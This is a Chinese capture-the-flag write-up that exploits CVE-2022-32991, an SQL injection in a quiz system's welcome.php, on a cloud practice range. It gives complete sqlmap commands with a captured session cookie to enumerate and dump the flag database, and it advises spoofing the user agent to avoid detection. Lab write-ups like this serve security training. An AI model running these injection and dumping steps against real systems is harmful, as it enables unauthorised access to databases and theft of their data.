【春秋云境】CVE-2022-32991
前期准备
靶场介绍
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。
春秋云境.com是依托春秋云技术打造的国内首家云上靶场社区,集演、训、学、测为一体,广泛支撑个人、企业、学校、科研院所等社会各类群体和组织在线进行网络安全学习、能力认证、漏洞研究、综合渗透、案例复现、竞赛演练等。
本期题目
主页→漏洞靶标→免费空间→CVE-2022-32991
题目简介
CVE-2022-32991简介
明确漏洞类型为:OWASP TOP 10 A03 注入
环境准备
1、Java 1.8 或 Java 17(适用于对应Burpsuite版本)
2、Python 2 或Python 3(适用于对应Sqlmap版本)
工具准备
1、Burpsuite
2、Sqlmap
3、FireFox
渗透测试
1、已知提示
该CMS的welcome.php中存在SQL注入攻击。
2、开启靶场
3、注册账户
REGISTER→任意注册一个
4、登录账户
进入到主页
查找目标
根据CVE官方:
在welcome.php,发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞。
观察该页面URL,发现虽然为welcome.php,但参数并不是eid
继续查找其他页面,点击第一栏Start进行跳转:
发现存在welcome.php和eid参数
抓包
1、开启FireFox的FoxyProxy的Burpsuite代理
2、开启Burpsuite代理
3、开启Burpsuite抓包
记录Sqlmap攻击所需的HTTP头部请求参数
--cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma"
--user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
其中,
--user-agent
可采用
--random-agent
代替
技术说明:由于该页面采用了登录访问,所以首先想到要使用–cookie参数使得sqlmap绕过身份验证,并添加–user-agent参数或–random-agent使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。
Sqlmap攻击
爆库
结合目标URL和Burpsuite所得参数,攻击语句如下:
python2 sqlmap.py -u "http://eci-2zeiqdtozk9he50hvar3.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" --cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma" --batch --dbs
执行界面如下:
得到所有数据库如下:
爆表
攻击语句如下:
python2 sqlmap.py -u "http://eci-2zeiqdtozk9he50hvar3.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" --cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma" --batch -D "ctf" --tables
执行界面如下:
得到的ctf库的所有表如下:
爆列
攻击语句如下:
python2 sqlmap.py -u "http://eci-2zeiqdtozk9he50hvar3.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" --cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma" --batch -D "ctf" -T "flag" --columns
执行界面如下:
得到的ctf库的flag表的所有列名如下:
爆字段
攻击语句如下:
python2 sqlmap.py -u "http://eci-2zeiqdtozk9he50hvar3.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" --cookie="PHPSESSID=k5854nfic1qngm5ul1vmb8pbma" --batch -D "ctf" -T "flag" -C"flag" --dump
执行界面如下:
得到题目的答案如下:
做题答疑
问:为什么我sqlmap可以爆出库表列,就是爆不出字段?如图:
答:靶场本身的问题,春秋云境Docker由于刚刚上线,访问人数较多,可能存在不稳定的现象,只需要重启靶场即可。
总结
题目CVE-2022-32991主要考察攻击者对于sqlmap参数的熟练运用,第一时间知道用到哪些参数
--cookie #绕过身份验证
--random-agent或--user-agent #绕过客户端验证
--batch #默认后续sqlmap操作都为Y
--p #指定sqlmap注入的传参参数